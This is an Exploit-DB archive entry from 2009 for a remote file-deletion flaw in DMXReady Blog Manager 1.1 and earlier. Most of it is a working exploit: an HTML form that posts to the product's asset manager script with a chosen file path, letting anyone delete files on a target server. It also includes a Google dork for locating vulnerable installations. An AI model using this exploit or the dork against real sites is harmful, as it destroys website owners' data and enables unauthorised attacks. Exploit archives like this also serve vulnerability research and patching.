DMXReady Blog Manager <= 1.1 - Remote File Delete Vulnerability

2009-01-14T00:00:00
ID EDB-ID:7764
Type exploitdb
Reporter ajann
Modified 2009-01-14T00:00:00

Description

DMXReady Blog Manager <= 1.1 Remote File Delete Vulnerability. Webapps exploit for php platform

                                        
                                            *******************************************************************************
# Title   :  DMXReady Blog Manager &lt;= 1.1 Remote Files Delete Vulnerability
# Author  :  "ajann" from Turkey
# Contact :   :( 
# S.Page  :  http://www.dmxready.com
# $$      :  199.97 $
# Dork    :  inurl:inc_webblogmanager.asp
# DorkEx  :

http://www.google.com.tr/search?hl=tr&q=inurl%3Ainc_webblogmanager.asp&meta=

****Stop Attack ABD and ISRAEL !


*******************************************************************************

&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;
&lt;title&gt;ajann Exp&lt;/title&gt;
&lt;/head&gt;

&lt;body&gt;
&lt;p&gt;Delete File : )&lt;/p&gt;
&lt;p&gt;Form Action: http://target/[path]/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp?ffilter=&lt;/p&gt;
&lt;form id="form1" name="form1" method="post" action="http://target/[path]/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp?ffilter="&gt;
  &lt;label&gt;
  &lt;input type="hidden" name="inpCurrFolder" value="" /&gt;
  &lt;/label&gt;
  &lt;p&gt;
    &lt;label&gt;
    Delete File Path:
    &lt;input type="text" name="inpFileToDelete" value="/shots/index.asp"&gt;
    &lt;/label&gt; 
    etc..
&lt;/p&gt;
  &lt;p&gt;
    &lt;label&gt;
    &lt;input type="submit" name="ff" id="ff" value="Submit" /&gt;
    &lt;/label&gt;
  &lt;/p&gt;
&lt;/form&gt;
&lt;p&gt;&lt;br /&gt;
&lt;/p&gt;
&lt;/body&gt;
&lt;/html&gt;

# milw0rm.com [2009-01-14]